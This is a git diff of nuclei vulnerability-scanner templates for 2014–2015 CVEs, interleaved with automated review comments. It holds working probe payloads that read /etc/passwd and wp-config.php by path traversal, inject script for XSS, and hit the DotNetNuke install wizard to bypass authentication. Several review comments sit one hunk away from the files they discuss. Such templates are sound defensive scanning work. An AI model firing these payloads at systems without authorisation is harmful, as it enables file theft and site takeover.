- type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml b/nuclei-templates/CVE-2014/cve-2014-8682.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-8682.yaml rename to nuclei-templates/CVE-2014/cve-2014-8682.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-9094.yaml b/nuclei-templates/CVE-2014/cve-2014-9094.yaml new file mode 100644 index 0000000000..8e73d7da9b --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-9094.yaml 
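Review bot: The `description:` describes what the template does (`Attempts to exploit the "shellshock" vulnerability ...`) rather than the vulnerability itself, unlike every other template in this commit; it should state the flaw and leave the probing behaviour to the request section. The file uses the legacy `requests:` key, separates `classification:` from the rest of `info` with a blank line after `tags:`, and lacks the `metadata.max-request` (eight paths), `impact:` and `remediation:` fields the commit adds elsewhere. The headers cause `/bin/cat /etc/passwd` to run on the target, so a positive hit has a real side effect on the scanned host and the matcher only fires on Unix-like targets where that file is readable by the CGI user; that caveat belongs in the description so operators know this is an active, not passive, check.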
@@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,cve2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2014/CVE-2014-9615.yaml b/nuclei-templates/CVE-2014/cve-2014-9615.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-9615.yaml rename to nuclei-templates/CVE-2014/cve-2014-9615.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml index d3f55c2a08..99fd990224 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-1000005.yaml 
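Review bot: This new file re-creates the template deleted as `CVE-2014-9094.yaml` elsewhere in this commit under a lowercase name, so it is effectively a rename plus edit that git did not pair; a real rename would keep history. `reference:` is a bare scalar here rather than a list as in every other template, and should be `reference:` / `  - https://nvd.nist.gov/vuln/detail/CVE-2014-9094`. The first word matcher's value appears as an empty string `""` in this rendering (probably stripped markup) — confirm the committed file carries the intended marker, and give that matcher an explicit `part: body` for symmetry with the header matcher that follows. The tag fix from `2014` to `cve2014` is correct.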
@@ -6,18 +6,32 @@ info: severity: high description: | WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. + remediation: | + Update to the latest version of the plugin. reference: - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0 - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005 - http://www.vapidlabs.com/advisory.php?v=142 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000005 cwe-id: CWE-22 - tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + epss-score: 0.047 + epss-percentile: 0.92455 + cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: candidate-application-form_project + product: candidate-application-form + framework: wordpress + tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd' @@ -31,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/21 +# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml index 20be79142a..9dd8f9e6f7 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-1000010.yaml 
@@ -6,6 +6,10 @@ info: severity: high description: | WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location. + impact: | + An attacker can exploit this vulnerability to read arbitrary files on the server. + remediation: | + Update to the latest version of the WordPress Simple Image Manipulator plugin. reference: - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543 @@ -15,10 +19,18 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1000010 - cwe-id: CWE-22 - tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp + cwe-id: CWE-284 + epss-score: 0.03171 + epss-percentile: 0.90143 + cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: simple-image-manipulator_project + product: simple-image-manipulator + framework: wordpress + tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd' @@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 +# digest: 490a0046304402204897681607efd5efa7419b4414d554d537b647ee8f3b82b28b5eb82cbf6b94780220070696d15d7aa49a984ce8ead0fd4ccbaa176cc380998024f33878546e311041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-1579.yaml b/nuclei-templates/CVE-2015/CVE-2015-1579.yaml index bf648b2a35..8b1cbf521f 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-1579.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-1579.yaml 
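Review bot: `cwe-id` changes from `CWE-22` to `CWE-284`, but the tags keep `lfi` and the description and request (`download.php?filepath=/etc/passwd`) describe an unauthenticated arbitrary file read; if this mirrors an NVD reclassification to improper access control that is fine, but then the description should mention the missing authentication check as the root cause rather than only "sanitize input", or CWE-22 should be kept. The new `remediation:` gives no fixed version (`Update to the latest version ...`); if none is published, say so explicitly so operators do not assume a patch exists.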
@@ -3,30 +3,43 @@ id: CVE-2015-1579 info: name: WordPress Slider Revolution - Local File Disclosure author: pussycat0x - severity: high + severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. + impact: | + An attacker can read arbitrary files on the server, potentially exposing sensitive information. + remediation: | + Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80 - https://nvd.nist.gov/vuln/detail/CVE-2015-1579 + - https://wpvulndb.com/vulnerabilities/7540 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 + epss-score: 0.90145 + epss-percentile: 0.9855 + cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: + max-request: 2 + vendor: elegant_themes + product: divi + framework: wordpress google-query: inurl:/wp-content/plugins/revslider - tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 + tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes -requests: +http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' stop-at-first-match: true + matchers-condition: and matchers: - type: word 
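Review bot: The added `vendor: elegant_themes`, `product: divi` and CPE `cpe:2.3:a:elegant_themes:divi:...` describe the Divi theme, while `name:` and the new `remediation:` refer to the Slider Revolution plugin and the requests target `action=revslider_show_image`; the description already flags a possible duplicate of CVE-2014-9734. Either the remediation should name the component actually probed (`Update the Slider Revolution plugin, or the Divi theme that bundles it, to a fixed release.`) or the CPE/product should be brought in line with the probe. `max-request: 2` correctly reflects the two paths.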
@@ -40,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/29 +# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-1880.yaml b/nuclei-templates/CVE-2015/CVE-2015-1880.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-1880.yaml rename to nuclei-templates/CVE-2015/CVE-2015-1880.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-20067.yaml b/nuclei-templates/CVE-2015/CVE-2015-20067.yaml index ecb635698b..63f8969bfe 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-20067.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-20067.yaml @@ -13,16 +13,23 @@ info: - https://packetstormsecurity.com/files/132693/ - https://seclists.org/fulldisclosure/2015/Jul/73 - https://nvd.nist.gov/vuln/detail/CVE-2015-20067 + - https://github.com/ARPSyndicate/cvemon classification: - cve-id: CVE-2015-20067 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 - cwe-id: 862 + cve-id: CVE-2015-20067 + cwe-id: CWE-862 + epss-score: 0.07226 + epss-percentile: 0.93884 + cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: wp_attachment_export_project + product: wp_attachment_export + framework: wordpress google-query: inurl:"/wp-content/plugins/wp-attachment-export/" - tags: cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wpscan + tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export http: - method: GET 
@@ -38,4 +45,4 @@ http: - 'contains(header, "text/xml")' - 'contains_all(body, "title","wp:author_id","wp:author_email")' condition: and -# digest: 4b0a00483046022100c3094b36bbe20fa181efa0ebb7100749ad77eb38a7c0c266f48d485931e8dbdc022100cdc3319af15d2f35ebdfcbe5c99e0304b65e039dd2108b84e5d010ef48ad9285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2068.yaml b/nuclei-templates/CVE-2015/CVE-2015-2068.yaml index 8317dbb2ab..592e896cfa 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2068.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2068.yaml @@ -1,4 +1,5 @@ id: CVE-2015-2068 + info: name: Magento Server Magmi Plugin - Cross Site Scripting author: daffainfo @@ -7,24 +8,25 @@ info: reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 - - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html - classification: - cve-id: CVE-2015-2068 tags: cve,cve2015,magento,magmi,xss,plugin + requests: - method: GET path: - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word part: body words: - "" + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-2196.yaml b/nuclei-templates/CVE-2015/CVE-2015-2196.yaml index 1d72518aff..2e0903f253 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2196.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2196.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Spider Calendar plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site. remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad @@ -17,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 - epss-score: 0.0093 - epss-percentile: 0.81213 + epss-score: 0.0025 + epss-percentile: 0.6433 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: web-dorado product: spider_calendar framework: wordpress - tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve + tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado http: - raw: @@ -42,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4a0a00473045022024f566bd4510a61cce4353295828d3562849cde0c7a5e45e70333d2eb33e131d0221008792a996718b2eb454c8c1f1cf4cf47638161ba95ec59ca02e765ce7ee893225:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2755.yaml b/nuclei-templates/CVE-2015/CVE-2015-2755.yaml index 930486eced..1c126b301d 100644 
--- a/nuclei-templates/CVE-2015/CVE-2015-2755.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2755.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2015-2755 cwe-id: CWE-352 - epss-score: 0.02569 - epss-percentile: 0.8909 + epss-score: 0.01828 + epss-percentile: 0.87952 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project http: - raw: 
@@ -54,4 +56,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 490a00463044022068fe2c4f26a94ce949aa1eeb0f231610dace2e0a41fb3376e5a56416b435bfdd0220192ad15bf6ef763460579612713ff89ce17b56b7dba659e587f0357019824795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2794.yaml b/nuclei-templates/CVE-2015/CVE-2015-2794.yaml new file mode 100644 index 0000000000..54b047868a --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-2794.yaml 
@@ -0,0 +1,48 @@
+id: CVE-2015-2794
+
+info:
+ name: DotNetNuke 07.04.00 - Administration Authentication Bypass
+ author: 0xr2r
+ severity: critical
+ description: |
+ The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-2794
+ - https://www.exploit-db.com/exploits/39777
+ - http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue
+ - http://www.dnnsoftware.com/community/security/security-center
+ - https://dotnetnuke.codeplex.com/releases/view/615317
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2015-2794
+ cwe-id: CWE-264
+ epss-score: 0.97458
+ epss-percentile: 0.99953
+ cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: dotnetnuke
+ product: dotnetnuke
+ fofa-query: app="DotNetNuke"
+ tags: cve2015,cve,dotnetnuke,auth-bypass,install
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Administrative Information"
+ - "Database Information"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+# digest: 4b0a00483046022100963e0da7dc7d871a054737b37e18f3cf4a88a499d60ab976e55a64b8b71b8f4802210098e0935f4fae3fb4f2771f8a890b65875b19cb5f1008ca03c9ac6ee6deebce71:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2015/CVE-2015-2863.yaml b/nuclei-templates/CVE-2015/CVE-2015-2863.yaml
index 613846ea0f..3a90c56323 100644
--- a/nuclei-templates/CVE-2015/CVE-2015-2863.yaml
+++ b/nuclei-templates/CVE-2015/CVE-2015-2863.yaml
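Review bot: The new template carries no `remediation` or `impact` field even though the description already names the fixed version (7.4.1) and the references include the vendor workaround post, so a reader has to leave the template to learn what to do; the other templates touched by this commit gain exactly these fields. Suggest `remediation: | Upgrade to DotNetNuke 7.4.1 or later, or apply the vendor workaround linked in the references.` and an impact line that restates the SuperUser consequence from the description. Since the matchers only confirm that the installation wizard answers 200 with its step headings, a hit on a fully installed site is itself the exposure; a short comment saying so would help whoever triages the finding.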
@@ -12,19 +12,21 @@ info: - https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt - http://www.kb.cert.org/vuls/id/919604 - https://nvd.nist.gov/vuln/detail/CVE-2015-2863 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - epss-percentile: 0.76609 + epss-percentile: 0.76747 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kaseya product: virtual_system_administrator - tags: cve,cve2015,redirect,kaseya + tags: cve2015,cve,redirect,kaseya http: - method: GET @@ -38,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a0047304502207cd69f7e040c1b805c185e203a27b7d056b6502794ad03632bd85b496507308e022100b6382056b3a5b60896e87b9e04dffc70456d3aed7a94d309fe962ec1321905fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2996.yaml b/nuclei-templates/CVE-2015/CVE-2015-2996.yaml index fa4ba511ed..56ac0bbd61 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2996.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2996.yaml 
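Review bot: The two new references (`ARPSyndicate/kenzer-templates`, `ARPSyndicate/cvemon`) point at generic template and CVE aggregator repositories rather than at anything specific to CVE-2015-2863, so they dilute a list that already has the vendor advisory, the CERT VU note and the NVD entry. The same aggregator links are added in the CVE-2015-2996, CVE-2015-4074, CVE-2015-5469, CVE-2015-7245 and CVE-2015-9312 hunks. Suggest dropping them, or keeping the reference list to primary sources so a reader can verify the finding without scanning a third-party index.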
@@ -1,32 +1,44 @@ id: CVE-2015-2996 info: - name: SysAid Help Desk <15.2 - Local File Disclosure + name: SysAid Help Desk <15.2 - Local File Inclusion author: 0x_Akoko severity: high description: | - Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum. + SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. + remediation: | + Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. 
reference: - https://seclists.org/fulldisclosure/2015/Jun/8 - - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk - http://seclists.org/fulldisclosure/2015/Jun/8 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C + cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 + epss-score: 0.77754 + epss-percentile: 0.98153 + cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: sysaid + product: sysaid shodan-query: http.favicon.hash:1540720428 - tags: cve,cve2015,sysaid,lfi,seclists + tags: cve2015,cve,sysaid,lfi,seclists -requests: +http: - method: GET path: - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -36,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-3035.yaml b/nuclei-templates/CVE-2015/CVE-2015-3035.yaml index 655d8fcadc..534a9216db 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-3035.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-3035.yaml 
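Review bot: The `cvss-metrics` vector is replaced by a CVSS 2.0 vector (`CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C`, score 8.5) where the template previously carried a CVSS 3.0 vector with score 7.5, so the template moves backwards in scoring standard and its score is no longer comparable with the other 2015 templates that use v3. The CVE-2015-3035 hunk makes the same v3-to-v2 swap (8.6 to 7.8). If the v2 vector is what the upstream feed provides, keep the v3 vector and score in `cvss-metrics`/`cvss-score` and record the v2 data separately rather than overwriting. Separately, the new `impact` only mentions file reads while the description also covers the CPU/memory denial of service through calculateRdsFileChecksum; `impact: | Unauthenticated attackers can read arbitrary files on the server or exhaust CPU and memory, causing a denial of service.` would match the description.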
@@ -6,22 +6,33 @@ info: severity: high description: | TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. + impact: | + An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information. + remediation: | + Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Apr/26 - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware - https://nvd.nist.gov/vuln/detail/CVE-2015-3035 + - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2015-3035 cwe-id: CWE-22 + epss-score: 0.58993 + epss-percentile: 0.97444 + cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: tp-link + product: tl-wr841n_\(9.0\)_firmware shodan-query: http.title:"TP-LINK" - verified: "true" - tags: router,lfi,seclists,cve,cve2015,tplink,kev + tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link -requests: +http: - method: GET path: - 
"{{BaseURL}}/login/../../../etc/passwd" @@ -35,5 +46,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/30 +# digest: 4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml deleted file mode 100644 index 34a797940a..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2015-3224 - -info: - name: Ruby on Rails Web Console - Remote Code Execution - author: pdteam - severity: critical - description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. - reference: - - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - - https://hackerone.com/reports/44513 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 - classification: - cve-id: CVE-2015-3224 - tags: ruby,hackerone,cve,cve2015,rce,rails - -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - headers: - X-Forwarded-For: ::1 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Rails.root:" - - "Action Controller: Exception caught" - condition: and - - - type: word - part: response - words: - - "X-Web-Console-Session-Id" - - "data-remote-path=" - - "data-session-id=" - case-insensitive: true - condition: or - -# Enhanced by mp on 2022/05/10 diff --git 